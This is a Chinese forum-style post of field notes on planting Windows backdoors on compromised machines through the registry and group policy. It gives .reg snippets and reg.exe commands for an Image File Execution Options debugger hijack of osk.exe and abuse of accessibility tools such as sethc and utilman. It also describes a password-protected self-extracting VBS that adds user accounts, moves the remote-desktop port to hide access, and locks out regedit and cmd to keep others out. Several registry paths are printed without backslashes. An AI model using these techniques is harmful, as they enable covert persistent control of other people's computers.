注册表及组策略后门实测手记


实测后记录下。有兴趣的结合一下,也许能从中得到后门的放置技巧
安静导入regedit /s *.reg

方法一、取消粘滞键 REG导入 sethc.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERControl PanelAccessibilityStickyKeys]
“Flags”=”506”
[HKEY_USERS.DEFAULTControl PanelAccessibilityStickyKeys]
“Flags”=”506”
注册表导入后,注销后生效。也就是将原值510改为506
方法二、开始→控制面板→辅助功能选项-键盘-粘滞键-设置-取消勾选“使用快捷键”复选框
高对比度:左侧 ALT + 左侧 SHIFT + PRINT SCREEN。
鼠标键:左侧 ALT + 左侧 SHIFT + NUM LOCK
这两个仍可调用sethc.exe作后门使用了。我们总不能与其它人用一样的shift 5次吧,其实调用的都是同一个东西

C:WINDOWSsystem32utilman.exe (辅助工具管理器)WIN+U 调用
C:WINDOWSsystem32osk.exe (屏幕键盘)
C:WINDOWSsystem32magnify.exe (放大镜) 注:这几个都是可利用的

映像方法
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsosk.exe]
“debugger”=”c:WINDOWS\System32\wbemysjy.exe”
sethc.exe配合映像方法的使用效果更好

综合以上我们可以作出如下后门
将 VBS加用户的脚本(http://bbs.77169.com/mainframe.php?tid=225157&fid=161),制作成带密码的自解压ysjy.exe。
优点如下:
1、运行时VBS带参数后//B,防止重复加用户时,出现不必要的对话窗口。
2、注意使用后自动删除,自解压能实现。哈哈脚本加密必尽是可逆的
3、不管是他将sethc.exe替换成什么后门都不影响、自己的后门使用。哈哈我朋友就碰到过,怎么换都不行
4、可以在cmd禁用的条件下使用,防止他人使用cmd。
5、带个密码总是安全不少,且自己用rar工具破解自解压是不成功的。实测。
6、shift 5次不能调出,与众不同了。调用方法见上

下面的代码是,保护自己的成果。。其实自己很少保护自己的成果
3380远程端口修改 3380.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminal ServerWdsRepwdTdsTcp]
“PortNumber”=dword:00000d34
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds
dpwdTds cp]
“PortNumber”=dword:00000d34
有必要改一下远程的端口,有很多人还是喜欢入侵前。先看一下3389有无shift后门。

注册表禁用与恢复
禁用
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
“DisableRegistryTools”=dword:00000001   //注册表恢复导入是行不通的。
恢复
gpedit.msc -用户配置–>管理模板–>系统 右面有个 -阻止访问注册表编辑工具-禁用
右键—新建–快捷方式—-
在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能
%WinDir%System32
eg.exe add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t

REG_DWORD /d 0 /f   (解注册表)
禁用注册表对肉鸡来说安全性提高不少,以上代码都是实测过的。网上的不见得行的通

禁用CMD
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsSystem]
“DisableCMD”=dword:00000001 //00000000恢复
右键—新建–快捷方式—-
在弹出的窗口“请键入项目的位置”输入栏里输入以下某例即可达到相干功能 其实不用注册表在rar里的附加参数就能修改注册表
%WinDir%System32
eg.exe add HKCUSoftwarePoliciesMicrosoftWindowsSystem   DisableCMD /t REG_DWORD /d 0 /f
禁用CMD对其它入侵者来说提权难度高了不少。